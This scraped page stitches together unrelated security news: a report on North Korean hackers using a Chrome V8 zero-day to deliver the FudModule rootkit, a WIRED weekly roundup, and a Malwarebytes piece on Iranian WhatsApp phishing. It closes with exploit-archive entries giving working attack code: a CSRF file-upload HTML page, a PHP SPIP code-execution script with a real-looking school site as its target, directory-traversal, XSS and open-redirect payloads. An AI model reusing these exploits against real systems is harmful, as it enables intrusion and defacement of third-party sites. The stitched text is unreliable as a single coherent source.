A recently patched security flaw in Google Chrome and other Chromium web browsers was exploited as a zero-day by North Korean actors in a campaign designed to deliver the FudModule rootkit.
The development is indicative of the persistent efforts made by the nation-state adversary, which had made a habit of incorporating rafts of Windows zero-day exploits into its arsenal in recent months.

Rootkit / Threat Intelligence

A recently patched security flaw in Google Chrome and other Chromium web browsers was exploited as a zero-day by North Korean actors in a campaign designed to deliver the FudModule rootkit.

The development is indicative of the persistent efforts made by the nation-state adversary, which had made a habit of incorporating rafts of Windows zero-day exploits into its arsenal in recent months.

Microsoft, which detected the activity on August 19, 2024, attributed it to a threat actor it tracks as Citrine Sleet (formerly DEV-0139 and DEV-1222), which is also known as AppleJeus, Labyrinth Chollima, Nickel Academy, and UNC4736. It's assessed to be a sub-cluster within the Lazarus Group (aka Diamond Sleet and Hidden Cobra).

It's worth mentioning that the use of the AppleJeus malware has been previously also attributed by Kaspersky to another Lazarus subgroup called BlueNoroff (aka APT38, Nickel Gladstone, and Stardust Chollima), indicative of the infrastructure and toolset sharing between these threat actors.

"Citrine Sleet is based in North Korea and primarily targets financial institutions, particularly organizations and individuals managing cryptocurrency, for financial gain," the Microsoft Threat Intelligence team said.

"As part of its social engineering tactics, Citrine Sleet has conducted extensive reconnaissance of the cryptocurrency industry and individuals associated with it."

The attack chains typically involve setting up fake websites masquerading as legitimate cryptocurrency trading platforms that seek to trick users into installing weaponized cryptocurrency wallets or trading applications that facilitate the theft of digital assets.

The observed zero-day exploit attack by Citrine Sleet involved the exploitation of CVE-2024-7971, a high-severity type confusion vulnerability in the V8 JavaScript and WebAssembly engine that could allow threat actors to gain remote code execution (RCE) in the sandboxed Chromium renderer process. It was patched by Google as part of updates released last week.

As previously stated by The Hacker News, CVE-2024-7971 is the third actively exploited type confusion bug in V8 that Google resolved this year after CVE-2024-4947 and CVE-2024-5274.

It's currently not clear how widespread these attacks were or who was targeted, but the victims are said to have been directed to a malicious website named voyagorclub\[.\]space likely through social engineering techniques, thereby triggering an exploit for CVE-2024-7971.

The RCE exploit, for its part, paves the way for the retrieval of shellcode containing a Windows sandbox escape exploit (CVE-2024-38106) and the FudModule rootkit, which is used to establish admin-to-kernel access to Windows-based systems to allow read/write primitive functions and perform \[direct kernel object manipulation\]."

CVE-2024-38106, a Windows kernel privilege escalation bug, is one of the six actively exploited security flaws that Microsoft remediated as part of its August 2024 Patch Tuesday update. That said, the Citrine Sleet-linked exploitation of the flaw has been found to have occurred after the fix was released.

"This may suggest a 'bug collision,' where the same vulnerability is independently discovered by separate threat actors, or knowledge of the vulnerability was shared by one vulnerability researcher to multiple actors," Microsoft said.

CVE-2024-7971 is also the third vulnerability that North Korean threat actors have leveraged this year to drop the FudModule rootkit, following CVE-2024-21338 and CVE-2024-38193, both of which are privilege escalation flaws in the built-in Windows drivers and were fixed by Microsoft in February and August.

"The CVE-2024-7971 exploit chain relies on multiple components to compromise a target, and this attack chain fails if any of these components are blocked, including CVE-2024-38106," the company said.

"Zero-day exploits necessitate not only keeping systems up to date, but also security solutions that provide unified visibility across the cyberattack chain to detect and block post-compromise attacker tools and malicious activity following exploitation."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

North Korean Hackers Deploy FudModule Rootkit via Chrome Zero-Day Exploit

Plus: China-linked hackers infiltrate US internet providers, authorities crack down on a major piracy operation, and a ransomware gang claims attacks during the Paris Olympics.

Pavel Durov, the founder and CEO of the communication app Telegram, was arrested in France on Saturday as part of an investigation into his and Telegram’s alleged failure to moderate illegal content on the platform, among other allegations. After being detained for four days, he was charged on Wednesday evening, barred from leaving France, and released on the condition of posting a €5 million ($5.5 million) bail and reporting to a French police station twice a week. The Paris prosecutor's office said on Wednesday that Durov faces complicity charges related to child sexual abuse material and drug trafficking, as well charges for importing cryptology without prior declaration, and a “near-total absence” of cooperation with French authorities.

“Nudify” deepfake websites that generate images of people's naked bodies without their consent have been incorporating mainstream single sign-on authentication systems into their websites, a WIRED investigation found. Discord and Apple are terminating some developers’ accounts over this usage.

Microsoft published research on Wednesday about a new multistage backdoor that the notorious Iranian hacking group APT 33 or Peach Sandstorm has been using to target victims in sectors including satellite, communications equipment, and oil and gas. And Google researchers found that suspected Russian hackers compromised Mongolian government websites between November 2023 and July 2024 and then infected vulnerable users who visited the sites with malware. Crucially, the attackers compromised targets using exploits that were identical or very similar to hacking tools created by the commercial spyware vendors NSO Group and Intellexa.

And there's more. Each week, we round up the security and privacy news we didn’t cover in depth ourselves. Click the headlines to read the full stories. And stay safe out there.

**CIA Says It Provided Key Intelligence to Thwart Terrorist Plot Against Vienna Taylor Swift Concert**

The US Central Intelligence Agency provided Austrian law enforcement with crucial intelligence that led to the arrest of suspects who were allegedly plotting to attack Taylor Swift concerts in Austria at the beginning of the month. All three of the singer's planned concerts were canceled at Vienna’s Ernst Happel Stadium because of the threat. CIA deputy director David Cohen said at the Insa intelligence conference on Wednesday, “Within my agency and others there were people who thought that was a really good day for Langley and not just the Swifties in my workforce.”

The central suspect is a 19-year-old Austrian of North Macedonian background who reportedly made a full confession. Austrian law enforcement also arrested an 18-year-old and a 17-year-old in relation to the plot. Cops also reportedly interrogated a 15-year-old. The plot was allegedly inspired by the Islamic State and included plans to attack fans outside the venue with knives or explosives. Earlier this month, Austrian interior minister Gerhard Karner said foreign intelligence agencies contributed to the investigation because Austrian law bars text message surveillance.

“They were plotting to kill a huge number, tens of thousands of people at this concert, including I am sure many Americans, and were quite advanced in this,” the CIA's Cohen said at the conference. “The Austrians were able to make those arrests because the agency and our partners in the intelligence community provided them information about what this ISIS-connected group was planning to do.”

**Hackers Are Compromising ISPs With Credential-Stealing Malware**

Hackers who may be backed by the Chinese government have been exploiting a recently patched vulnerability in network management virtualization software known as Versa Director to compromise at least four US-based internet service providers and steal authentication credentials used by their customers. Researchers from Lumen's Black Lotus Labs, said on Thursday that the attacks began as early as June 12 and are likely still going on. Hackers exploit the Versa Director vulnerability to install remote access malware that Lumen dubbed allow “VersaMem.”

“Given the severity of the vulnerability, the implications of compromised Versa Director systems, and the time that has now elapsed to allow Versa customers to patch the vulnerability, Black Lotus Labs felt it was appropriate to release this information at this time,” the researchers wrote in a blog post. “Lumen Technologies shared threat intelligence to warn appropriate US government agencies of the emerging risks that could impact our nation’s strategic assets.”

**Vietnamese Law Enforcement Takedown “Fmovies” Piracy Ring**

The movie studio coalition known as the Alliance for Creativity and Entertainment said on Thursday that Hanoi police have investigated and taken down the Vietnam-based pirate streaming service Fmovies and its affiliates. The working group said it collaborated with law enforcement and provided information about Fmovies, which it called “the largest pirate streaming operation in the world.” The group added that Fmovies and its affiliate sites—which included bflixz, flixtorz, movies7, myflixer, and aniwave—had more than 6.7 billion visits between January 2023 and June 2024. The law enforcement operation also led to the takedown of video hosting provider Vidsrc.to and its affiliates because these services were allegedly “operated by the same suspects.” Hanoi police have arrested two men in connection with the case.

**Brain Cipher Ransomware Gang Claims Attacks During the Olympics**

Following a digital attack against dozens of French museums during the Olympic Games earlier this month, the ransomware gang known as Brain Cipher has claimed responsibility for the hacks and is threatening to leak 300 GB of stolen data from the museums. Le Grand Palais and dozens of other French national museums and cultural organizations are overseen by Réunion des Musées Nationaux – Grand Palais and reportedly all use some shared digital infrastructure, which the attackers targeted.

Taylor Swift Concert Terror Plot Was Thwarted by Key CIA Tip

Iranian spies posing as technical support agents contacted targeted individuals in Israel, Palestine, Iran, the UK, and the US on WhatsApp

An Iranian state-sponsored group often referred to as Iran’s Islamic Revolutionary Guard Corps (IRGC) is making headlines again this season as Meta disclosed that the cybercriminals targeted WhatsApp users in Israel, Palestine, Iran, the UK, and the US.

Other names for this group—depending on the vendor– are APT42, Storm-2035, Charming Kitten, Damselfly, Mint Sandstorm, TA453, and Yellow Garuda.

Earlier the group was linked to disinformation campaigns around the US elections in a Microsoft threat report, Google research findings, and when OpenAI banned accounts linked to an Iranian influence operation.

It is no surprise that nations like Iran have an interest in influencing elections in the US and the targets in this campaign also included staff members of President Joe Biden and former President Donald Trump.

Meta blocked a small cluster of WhatsApp accounts posing as support agents for tech companies. These accounts used social engineering against political and diplomatic officials, and other public figures. This type of attacks is called spear phishing, as it involves highly targeted phishing attempts.

The fake accounts linked to the Iranian group posed as technical support for AOL, Google, Yahoo, and Microsoft.

The APT in APT42 stands for advanced persistent threat (APT), which signifies a prolonged, aimed attack on a specific target with the intention to compromise their system and gain information from or about that target.

This is exactly the kind of group that you will see involved in spear phishing attacks, that target individuals to collect information about them, or manipulate them into revealing information about their occupation, or compromise their devices and accounts so they can spy on them.

There is no evidence that this group managed to compromise any accounts and Meta praises the targets that reported these suspicious messages using the in-app reporting tools, so WhatsApp could launch an investigation and disrupt the campaign.

Phishers often use technical support accounts in phishing attempts because people tend to trust them with information if they happen to be a customer of the company that the “support agent” claims to represent.

WhatsApp users should remain on the lookout for unsolicited contacts and messages.

*   If a message looks suspicious, comes unsolicited, or sounds too good to be true, don’t tap, share, or forward it. Don’t become part of a misinformation campaign.
*   Always inspect links and attached files thoroughly before opening them. Ask the known sender through other means what it’s for.
*   Do not engage in conversations when you are not sure who the sender is. Even the fact that you respond to them will tell them this is a way to reach you and might lead to more attempts.

**We don’t just report on threats – we help protect your social media**

Cybersecurity risks should never spread beyond a headline. Protect your social media accounts by using Cyrus, powered by Malwarebytes.

 Iranian cybercriminals are targeting WhatsApp users in spear phishing campaign 

Google Chrome versions prior to 125.0.6422.112 V8 type confusion proof of concept exploit.

Google Chrome V8 Type Confusion

Water Billing Management System version 1.0 suffers from a cross site request forgery that enables an arbitrary file upload.

    =============================================================================================================================================| # Title     : Water Billing Management System 1.0 CSRF Vulnerability                                                                      || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/wbms_1.zip                                            |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This HTML page is designed to remotely upload arbitrary files and modify script settings.[+] Line 33 : Set your target url[+] save payload as poc.html [+] payload : <!DOCTYPE html><html lang="en"><head>    <meta charset="UTF-8">    <meta name="viewport" content="width=device-width, initial-scale=1.0">    <title>Direct File Upload</title></head><body>    <h2>Direct File Upload</h2>    <form id="uploadForm">        <label for="fileInput">Select File:</label>        <input type="file" id="fileInput" name="fileInput" required><br><br>        <button type="button" onclick="uploadFile()">Upload File</button>    </form>    <script>        function uploadFile() {            const fileInput = document.getElementById('fileInput').files[0];            if (!fileInput) {                alert('Please select a file.');                return;            }            const formData = new FormData();            formData.append('name', '<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>');            formData.append('img', fileInput);            console.log("(+) Uploading file...");            fetch('http://127.0.0.1/wbms/classes/SystemSettings.php?f=update_settings', { // Replace with your upload URL                method: 'POST',                body: formData            })            .then(response => response.text())            .then(data => {                if (data === '1') {                    console.log("(+) File upload seems to have been successful!");                } else {                    console.log("(-) Oh no, the file upload seems to have failed!");                }            })            .catch(error => console.error("(-) Error during file upload:", error));        }    </script></body></html>        Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Water Billing Management System 1.0 Cross Site Request Forgery / File Upload

Webpay E-Commerce version 1.0 suffers from a directory traversal vulnerability.

    =============================================================================================================================================| # Title     : Webpay E-Commerce v1.0 Directory traversal Vulnerability                                                                    || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : http://webpay.com.np/                                                                                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : //bower_components/bootstrap/dist/css/../../Gemfile[+] https://www/127.0.0.1/demo/gajrajgraphics.com.np/home/bower_components/bootstrap/dist/css/../../GemfileGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Webpay E-Commerce 1.0 Directory Traversal

SPIP version 4.2.6 suffers from a code execution vulnerability.

    =============================================================================================================================================| # Title     : SPIP 4.2.6 PHP Code execution Vulnerability                                                                                 || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://www.spip.net/                                                                                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Line 49 : Set your target.[+] Save Payload as poc.php and run from cmd = C:\www\test>php poc.php[+] Payload :<?phpclass IndoushkaExploit {    private $targetUrl;    private $payload;    public function __construct($targetUrl, $payload) {        $this->targetUrl = rtrim($targetUrl, '/') . '/spip.php';        $this->payload = $this->generatePayload($payload);    }    private function generatePayload($payload) {        // توليد الحمولة مع تضمين الأمر المراد تنفيذه        return "[<img" . rand(10000000, 99999999) . ">->URL`<?php {$payload} ?>`]";    }    public function exploit() {        // إعداد بيانات POST التي سيتم إرسالها إلى الهدف        $data = http_build_query(['action' => 'porte_plume_previsu', 'data' => $this->payload]);        // تهيئة طلب HTTP باستخدام دالة cURL        $ch = curl_init($this->targetUrl);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        curl_setopt($ch, CURLOPT_POST, true);        curl_setopt($ch, CURLOPT_POSTFIELDS, $data);        // إضافة رؤوس مخصصة لتجاوز المنع        curl_setopt($ch, CURLOPT_HTTPHEADER, [            'Content-Type: application/x-www-form-urlencoded',            'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'        ]);        // تنفيذ الطلب        $response = curl_exec($ch);        // تحقق من وجود أخطاء في cURL        if (curl_errno($ch)) {            echo "cURL Error: " . curl_error($ch) . "\n";        } else {            echo "Exploit Sent! Response:\n";            echo $response;        }        curl_close($ch);    }}// مثال على الاستخدام$targetUrl = 'https://eps.enseigne.ac-lyon.fr/spip/'; // استبدل هذا بالعنوان الحقيقي$payload = 'system("pwd");'; // أوامر PHP التي تريد تنفيذها$exploit = new IndoushkaExploit($targetUrl, $payload);$exploit->exploit();Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

SPIP 4.2.6 Code Execution

WordPress GetYourGuide Ticketing plugin version 1.0.6 suffers from a cross site scripting vulnerability.

    =============================================================================================================================================| # Title     : WordPress GetYourGuide Ticketing plugin 1.0.6 XSS Vulnerability                                                             || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://downloads.wordpress.org/plugin/getyourguide-ticketing.1.0.6.zip                                                     |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] infected item : <input type="text" name="partner_hash" value="<?php echo $partner_hash?>"></input>[+] Install the plugin ‘GetYourGuide Ticketing’ & activate it.[+] Navigate toward the GYG-Ticketing.[+] USe Payload : ` “><img src=x onerror=alert(1)>`[+] Go to link builder to verify the XSS pop-up.Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

WordPress GetYourGuide Ticketing 1.0.6 Cross Site Scripting

WordPress SeatReg plugin version 1.54.0 suffers from an open redirection vulnerability.

    =============================================================================================================================================| # Title     : WordPress SeatReg plugin 1.54.0 open redirection Vulnerability                                                              || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://wordpress.org/plugins/seatreg/                                                                                      |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] An Open Redirection is a vulnerability when a web application or server    uses an unvalidated user-submitted link to redirect the user to a given    website or page.[+] USe Payload : new-registration-name=dedeed&action=seatreg_create_submit&seatreg-admin-nonce=11b1308e8a&*_wp_http_referer=https://evil.com[+] POST /wp-admin/admin-post.php HTTP/1.1Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

WordPress SeatReg 1.54.0 Open Redirection

WordPress WP Event Manager plugin version 3.1.44 suffers from a cross site scripting vulnerability.

    =============================================================================================================================================| # Title     : WordPress WP Event Manager plugin 3.1.44 XSS Vulnerability                                                                  || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://wordpress.org/plugins/wp-event-manager/                                                                             |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Install the plugins - wp-event-manager and activate it.[+] Go to event manager —> Add New - Inside the “”Event Title” at the top, enter XSS payload “><img src=xonerror=alert(1)> and hit publish.[+] Check the newly made event’s URL /event/{id}/ , XSS will trigger.Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Tag

#google